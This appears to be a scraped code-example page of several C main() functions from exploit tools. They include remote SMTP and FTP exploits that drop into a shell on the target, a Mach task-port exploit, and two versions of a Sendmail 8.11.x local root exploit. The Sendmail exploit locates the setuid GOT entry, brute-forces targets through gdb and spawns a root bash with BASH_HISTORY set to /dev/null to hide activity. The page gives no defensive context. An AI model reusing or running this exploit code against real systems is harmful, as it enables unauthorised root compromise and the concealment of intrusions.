Beispiel #1
0
int main(int argc, char **argv)
{
    int sock = 0,   npad = 0;
    u_int   retloc  = 0,    retaddr = 0;
    char    *host = NULL;

    if(parse_args(argc, argv, &host, &npad, &retloc, &retaddr))
        bye("Usage: %s < host > < padding > < retloc > < retaddr >\n", argv[0]);

    printf("--{ Smack 1.oohaah\n\n");

    sock = conn(host, SMTP_PORT);

    printf("--{ definitely, adv.:\n"
           "--{ 1. Having distinct limits\n"
           "--{ 2. Indisputable; certain\n"
           "--{ 3. Clearly defined; explicitly precise\n\n"
          );

    sploit(sock, npad, retloc, retaddr);

    printf("--{ Attempting to redefine the meaning of 'definitely'\n\n");

    shell(host, SHELL_PORT);

    return EXIT_SUCCESS;
}
int main(int argc, char **argv)
{
    int sock = 0;
    args    argy;

    memset(&argy, 0, sizeof(argy));
    argy.align = ALIGN;
    argy.port = FTP_PORT;
    argy.remote_file = REMOTE_FILE;

    parse_args(argc, argv, &argy);
    
    sock = conn(argy.host, argy.port, SOCK_DGRAM);
 
    sploit(&argy, sock);
    
    sleep(2);
    printf("triggering overwritten jumpslot\n\n");
    trigger_retloc(sock);
    sleep(1);
    close(sock);

    shell(argy.host, SHELL_PORT);

    return EXIT_SUCCESS;
}
int main(int argc, char **argv)
{
    int sock = 0;
    args args;

    memset(&args, 0, sizeof(args));
    parse_args(argc, argv, &args);
    sock = conn(args.host, args.port);
    login(args.user, args.pass, sock);
    sploit(&args, sock);
    close(sock);
    sleep(20);
    shell(args.host, SHELL_PORT);

    return 0;
}
Beispiel #4
0
int main(int argc, char** argv) {
  setup_shared_port();

  pid_t child_pid = fork();
  if (child_pid == -1) {
    FAIL("forking");
  }

  if (child_pid == 0) {
    mach_port_t shared_port_child = recover_shared_port_child();
    do_child(shared_port_child);
  } else {
    mach_port_t shared_port_parent = recover_shared_port_parent();
    mach_port_t child_task_port = do_parent(shared_port_parent);
    sploit(child_pid, child_task_port);
  }

  return 0;
}
Beispiel #5
0
int	main(int argc, char *argv[])
{
	char	victim[256] = SM;
	char	vict[256];
	char	gscr[256];
	char	path[256];
	
	char	d[256];
	struct	stat	st;
	FILE	*f;
	char	buf[256];
	int	got;

	struct	target t[1024];
	uint	off, ep, l;
	int	i,j;

	int	offset = -16384;
	int	esp;
	int	depth = 32;
	int	brute = 0;

	/* rootshell (if argv[0] == NULL) */
	if (!*argv) {
		/* open stdin and stdout */
		dup2(2, 0);
		dup2(2, 1);
		setuid(0);	/* regain root privs */
		setgid(0);
		/* send signal to parent that exploit is done */
		kill(getppid(), SIGUSR1);
		/* l-a-m-e ;) */
		printf("\nVoila babe, entering rootshell!\nEnjoy!\n"); fflush(stdout);
		chdir("/");
		system("/usr/bin/id");
		setenv("BASH_HISTORY", "/dev/null", 1);
		execl("/bin/bash", "-bash", NULL);
	}

	printf("\n...-=[ Sendmail 8.11.x exploit, (c)oded by [email protected] [sd@ircnet], 2001 ]=-...\n"
	       "      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n");

	while ( ( i = getopt(argc, argv, "hd:o:v:t:b") ) != EOF) {
		switch (i) {
			case 'd':
				if ((!optarg) || (sscanf(optarg, "%d", &depth) != 1))
					return use(argv[0]);
				break;
			case 'o':
				if ((!optarg) || (sscanf(optarg, "%d", &offset) != 1))
					return use(argv[0]);
				break;
			case 'v':
				if (!optarg) return use(argv[0]);
				strcpy(victim, optarg);
				break;
			case 't':
				if (!optarg) return use(argv[0]);
				strcpy(ourdir, optarg);
				break;
			case 'b':
				brute++;
				break;
			case 'h':
			default:
				return use(argv[0]);
		}
	}
	if (brute) printf("[*] Using brute force, this may take some time\n");
	/* create full path to rootshell, cause
           sendmail will change it's cwd */
	path[0] = 0;
	if (argv[0][0] != '/') {
		getcwd(path, 256);
	}

	/* construct shellcode */
	sprintf(scode, "%s%s/%s", shellcode, path, argv[0]);

	/* get stack frame */
	esp = get_esp();
	close(0);
	signal(SIGUSR1, sigusr);

	/* remove old stuff */
	giveup(-1);

	printf( "[*] Victim = %s\n"
		"[*] Depth  = %d\n"
		"[*] Offset = %d\n"
		"[*] Temp   = %s\n"
		"[*] ESP    = 0x%08x\n",
		victim,
		depth,
		offset,
		ourdir,
		esp);
	stat(victim, &st);
	if ((st.st_mode & S_ISUID) == 0) {
		printf("[-] Bad: %s isn't suid ;(\n", victim);
	}

	if (access(victim, R_OK + X_OK + F_OK) < 0) {
		printf("[-] Bad: We haven't access to %s !\n", victim);
	}

	if (mkdir(ourdir, 0777) < 0) {
		perror("[-] Can't create our tempdir!\n");
		giveup(1);
	}
	printf("[+] Created %s\n", ourdir);
	sprintf(buf, "%s -R %s | grep setuid", OBJDUMP, victim);
	f = popen(buf, "r");
	if (fscanf(f, "%x", &got) != 1) {
		pclose(f);
		printf("[-] Cannot get setuid() GOT\n");
		giveup(1);
	}
	/* get GOT */
	pclose(f);
	printf("[+] Step 1. setuid() got = 0x%08x\n", got);
	sprintf(vict, "%s/sm", ourdir);
	printf("[*] Step 2. Copying %s to %s...", victim, vict); fflush(stdout);
	sprintf(buf, "/bin/cp -f %s %s", victim, vict);
	system(buf);
	if (access(vict, R_OK + X_OK + F_OK) < 0) {
		perror("Failed");
		giveup(1);
	}
	printf("OK\n");
	/* disassemble & find targets*/
	printf("[*] Step 3. Disassembling %s...", vict); fflush(stdout);
	if (!brute) {
		sprintf(buf, DLINE, DLINEA);
	} else {
		sprintf(buf, BRUTE_DLINE, BRUTE_DLINEA);
	}
	f = popen(buf, "r");
	i = 0;
	while (fgets(buf, 256, f)) {
		int	k, dontadd = 0;
		if (sscanf(buf, "%x: %s %s %s %s %s %s 0x%x,%s\n",
                    &ep, d, d, d, d, d, d, &off, d) == 9) {
			/* same value ? */
			for (k=0; k < i; k++) {
				if (t[k].off == off) dontadd++;
			}
			/* new value ? */
			if (!dontadd) {
				/* add it to table */
				t[i].off = off;
				t[i++].brk = ep;
			}
		}
	}
	pclose(f);
	printf("OK, found %d targets\n", i);

	/* gdb every target and look for theyr VECT */
	printf("[*] Step 4. Exploiting %d targets:\n", i); fflush(stdout);
	sprintf(gscr, "%s/gdb", ourdir);

	off = 0;
	for (j=0; j < i; j++) {
		/* create gdb script */
		f = fopen(gscr, "w+");
		if (!f) {
			printf("Cannot create gdb script\n");
			giveup(1);
		}
		fprintf(f, "break *0x%x\nr -d1-1.1\nx/x 0x%x\n", t[j].brk, t[j].off);
		fclose(f);
		sprintf(buf, "%s -batch -x %s %s 2> /dev/null", GDB, gscr, vict);
		f = popen(buf, "r");
		if (!f) {
			printf("Failed to spawn gdb!\n");
			giveup(1);
		}
		/* scan gdb's output */
		while (1) {
			char buf[256];
			char *p;
			t[j].vect = 0;
			p = fgets(buf, 256, f);
			if (!p) break;
			if (sscanf(p, "0x%x %s 0x%x", &ep, d, &l) == 3) {
				t[j].vect = l;
				off++;
				break;
			}
		}
		pclose(f);
		if (t[j].vect) {
			int	pid;
			printf("[%d] (%d%% of targets) GOT=0x%08x, VECT=0x%08x, offset=%d\n", j, j*100/i , got, t[j].vect, offset);
			fflush(stdout);
			pid = fork();
			if (pid == 0) {
				close(1);
				sploit(victim, got, t[j].vect, esp + offset);
			}
			/* wait until sendmail finishes (expoit failed)
	                   or until SIGUSR arrives */
			wait(NULL);
			/* exploited ?? */
			if (exploited) {
				wait(NULL);	/* kill zombie */
				printf("Thanx for choosing sd's products ;)\n");
				exit(0);
			}
		}
	}
	printf("[-] All targets failed, probably not vulnerable ;(\n");
	giveup(1);
}
int main(int argc, char *argv[]) {
 char victim[256] = SM;
 char vict[256],gscr[256],
      path[256],d[256],buf[256];
 struct stat st;
 FILE *f;
 struct target t[1024];
 uint off,ep,l;
 int i,j,got,esp;
 int offset = -16384;
 int depth = 32;
 int brute = 0;

 if (!*argv) {
  dup2(2, 0);
  dup2(2, 1);
  setuid(0);
  setgid(0);
  kill(getppid(), SIGUSR1);
  printf(
   "------(*)>+== "
   "ENTERING ROOT SHELL"
   " ==+<(*)------"
   );
  fflush(stdout);
  chdir("/");
  setenv("PATH",
   "/bin:/usr/bin:/usr/local/bin:"
   "/sbin:/usr/sbin:/usr/local/sbin:"
   "/opt/bin:${PATH}",1);
  setenv("BASH_HISTORY",
   "/dev/null", 1);
  execl("/bin/bash", "-bash", NULL);
 }
 printf(
  "  ------------------------------------------------\n"
  "   Sendmail 8.11.x linux i386 exploit  \n"
  "                  wroten by [email protected] [sd@ircnet], \n"
  "                   fixed by [email protected] \n"
  "  ------------------------------------------------\n"
  "   type \"%s -h\" to get help\n",argv[0]
 );

while ((i=getopt(argc,argv,"hd:o:v:t:b"))!=EOF){
 switch (i) {
  case 'd':
   if ((!optarg)||(sscanf(optarg,"%d",&depth)!=1))
    return use(argv[0]);
  break;
  case 'o':
   if ((!optarg)||(sscanf(optarg,"%d",&offset)!=1))
    return use(argv[0]);
  break;
  case 'v':
   if (!optarg)
    return use(argv[0]);
   strcpy(victim,optarg);
  break;
  case 't':
   if (!optarg)
    return use(argv[0]);
   strcpy(ourdir, optarg);
  break;
  case 'b':
   brute++;
  break;
  case 'h':
  default:
   return use(argv[0]);
 }
}
 if (brute)
  printf(
   "[*] brute force "
   "to 20-30mins\n");
 path[0] = 0;
 if (argv[0][0] != '/') {
  getcwd(path, 256);
 }
 sprintf(scode, "%s%s/%s",
    shellcode, path, argv[0]);
 esp = get_esp();
 close(0);
 signal(SIGUSR1, sigusr);
 giveup(-1);
 printf(
  " [Victim=%s][Depth=%d][Offset=%d]\n"
  " [Temp=%s][Offset=%d][ESP=0x%08x]\n",
   victim, depth, offset, ourdir, esp
 );
stat(victim, &st);
if ((st.st_mode & S_ISUID) == 0) {
 printf("[!] Error: %s doesn't have SUID mode\n",
        victim);
}
if (access(victim, R_OK + X_OK + F_OK) < 0) {
 printf("[!] Error: %s must exist, have mode +rx\n",
        victim);
}
if (mkdir(ourdir, 0777) < 0) {
 perror("[!] Error: creating temporary directory\n");
 giveup(1);
}
//printf("[*] creating temp directory - %s\n",
//      ourdir);
sprintf(buf, "%s -R %s | %s setuid",
        OBJDUMP, victim, GREP);
f = popen(buf, "r");
if (fscanf(f, "%x", &got) != 1) {
 pclose(f);
 printf("[!] Error: cannot get "
        "setuid() GOT\n");
 giveup(1);
}
 pclose(f);
 printf("[*] --> Step 1. setuid() "
        "[got=0x%08x]\n", got);
 sprintf(vict, "%s/sm", ourdir);
 printf("[*] --> Step 2. copy "
        "[%s->%s]\n", victim, vict);
 fflush(stdout);
 sprintf(buf, "%s -f %s %s",
         COPYCMD, victim, vict);
 system(buf);
 if (access(vict,R_OK+X_OK+F_OK)<0){
  printf(
   "[!] Error: copy victim to out temp\n");
  giveup(1);
 }

 printf(
    "[*] --> Step 3. disassm our "
    "[%s]\n", vict);
 fflush(stdout);
 if (!brute) {
  sprintf(buf,DLINE,DLINEA);
 } else {
  sprintf(buf,BRUTE_DLINE,BRUTE_DLINEA);
 }
 f = popen(buf, "r");
 i = 0;
 while (fgets(buf,256,f)) {
  int k, dontadd=0;
  if (sscanf(buf,
       "%x: %s %s %s %s %s %s 0x%x,%s\n",
        &ep,d,d,d,d,d,d,&off,d)==9){
   for (k=0;k<i;k++){
    if (t[k].off==off)
     dontadd++;
   }
   if (!dontadd) {
    t[i].off = off;
    t[i++].brk = ep;
   }
  }
 }
 pclose(f);
 sprintf(gscr, "%s/gdb", ourdir);
 off = 0;
 for (j=0; j < i; j++) {
  f = fopen(gscr, "w+");
  if (!f) {
   printf("[!] Error: Cannot create gdb script\n");
   giveup(1);
  }
  fprintf(f,
    "break *0x%x\nr -d1-1.1\nx/x 0x%x\n",
    t[j].brk, t[j].off);
  fclose(f);
  sprintf(buf,
    "%s -batch -x %s %s 2> /dev/null",
    GDB, gscr, vict);
  f = popen(buf, "r");
  if (!f) {
   printf("[!] Error: Failed to spawn gdb!\n");
   giveup(1);
  }
  while (1) {
   char buf[256];
   char *p;
   t[j].vect = 0;
   p = fgets(buf, 256, f);
   if (!p) break;
   if (sscanf(p,"0x%x %s 0x%x",&ep,d,&l)==3){
    t[j].vect = l;
    off++;
    break;
   }
  }
  pclose(f);
  if (t[j].vect) {
   int pid;
   printf(" ++[%d/%d](%d%%) "
          "GOT=0x%08x,VECT=0x%08x,"
          "OFF=%d\n", j, i, j*100/i,
          got, t[j].vect, offset);
   fflush(stdout);
   pid = fork();
   if (pid == 0) {
    close(1);
    sploit(victim,got,t[j].vect,esp+offset);
   }
   wait(NULL);
   if (exploited) {
    wait(NULL);
    printf("        [-*-] We rule! BYE! [-*-]\n");
    exit(0);
   }
  }
 }
 printf(
  "[!] ERROR: all targets failed,"
  "probably not buggie\n");
 giveup(1);
}